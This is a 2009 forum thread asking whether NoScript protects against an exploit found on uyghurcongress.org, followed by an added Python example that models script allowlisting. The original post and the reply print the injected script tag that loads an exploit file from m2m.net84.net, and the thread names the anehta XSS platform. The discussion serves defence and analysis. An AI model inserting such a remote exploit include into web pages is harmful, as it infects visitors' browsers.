
anehta from axis - does NoScript protect?

Posted: Mon Jul 27, 2009 3:46 pm
by luntrus
Hi forum members,

Look at the following malcode analysis:
exploit
Here are the details I encountered:

1. Virus identified: JS-CVE-2009-1136-A[Expl] (which is an Exploit)
2. Web address: wXw.uyghurcongress.org/En/home.asp
3. Malicious file identified by Avast!: m2m.net84.net/cn/document.js

The mentioned site with this document.js is the site where the malcode resides:

Code:

[EDITED by me for security reasons and against scanner detection]^^script src="htxtp://m2m.net84.net/cn/document.js"^^/script 

And this is:
Title:
HTTP Error 403 Forbidden
URL: hXtp://m2m.net84.net/cn
Redirects: 301 -> hXtp://m2m.net84.net/cn/
where I find the following:

Code:

 [again EDITED by me]
^a href="anehta-v0.6.0fixed/" anehta-v0.6.0fixed/^/a></li

And this is the crux of the malcode, because of its description (Packet Storm's):
Anehta is a PHP/Javascript based platform to make cross site scripting and other web attacks easier.
Author: axis
Homepage: hXtp://code.google.com/p/anehta/
File Size: 5596731
Last Modified: Nov 25 17:46:32 2008
MD5 Checksum: 5316c6cb785caef595c58e80a97f4ce8
More info on this new XSS platform: http://archives.neohapsis.com/archives/ ... /0565.html
The other redirect is to:
302 -> hXtp://error.000webhost.com/forbidden.html

Is NoScript protecting us against anehta driven exploits?

luntrus

Re: anehta from axis - does NoScript protect?

Posted: Tue Jul 28, 2009 12:39 am
by therube
First, when you visit uyghurcongress (presumably) JavaScript is not allowed, so the exploit is thwarted right there.

Code:

<script src="http://m2m.net84.net/cn/document.js"></script>

Second, even if you do Allow JavaScript on uyghurcongress, the exploit is still hosted on a foreign domain, so again the exploit is thwarted.

Third, the exploit page itself doesn't seem to be returning anything at the moment.
(I wonder if it might only do something if you're visiting from a .cn domain?)

Code:

Secur1ty just lik3 a grl. B0th of th3m h4ve s0me h0les. Y0u alw4ys try to f1nd the h0le, but n0t 3very tim3 y0u c4n 3xpl0it it!
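To make the two points in the answer above concrete, here is an added example (not from the thread or from NoScript itself) that models per-source script allowlisting over a constructed page: an inline script, a first-party include, and a remote include of the kind seen in the thread. The model is a simplification and an assumption: scripts on a page execute only when the page host is allowed, and an external script additionally needs its own host allowed; all URLs are constructed sample values.

```python
"""Simplified model of per-source script allowlisting (an assumption for this
example, not NoScript's actual implementation)."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample page: inline script, first-party include, remote include.
SAMPLE_PAGE_URL = "http://www.example.org/En/home.asp"
SAMPLE_HTML = """
<html><body>
<script>document.title = 'home';</script>
<script src="/js/site.js"></script>
<script src="http://third-party.example.net/cn/document.js"></script>
</body></html>
"""


class ScriptCollector(HTMLParser):
    """Collect each <script> element's src attribute (None for inline scripts)."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.scripts.append(dict(attrs).get("src"))


def collect_scripts(page_url, html):
    """Return absolute script URLs in document order; None marks an inline script."""
    parser = ScriptCollector()
    parser.feed(html)
    return [urljoin(page_url, s) if s else None for s in parser.scripts]


def evaluate(page_url, html, allowlist):
    """Label each script 'run' or 'blocked' under the simplified allowlist model.
    Page host not allowed: nothing runs.  Page host allowed: inline and
    first-party scripts run; a remote script runs only if its host is allowed."""
    allowed = {h.lower() for h in allowlist}
    page_host = urlsplit(page_url).hostname.lower()
    verdicts = []
    for src in collect_scripts(page_url, html):
        label = src or "(inline)"
        if page_host not in allowed:
            verdicts.append((label, "blocked"))  # first point: JS off on the page
            continue
        host = urlsplit(src).hostname.lower() if src else page_host
        verdicts.append((label, "run" if host in allowed else "blocked"))
    return verdicts


def blocked_sources(page_url, html, allowlist):
    """Convenience view: just the scripts that would not execute."""
    return [label for label, v in evaluate(page_url, html, allowlist) if v == "blocked"]
```

Running `evaluate` with an empty allowlist blocks everything, and allowing only `www.example.org` still leaves the remote include blocked, which is the second point in the answer.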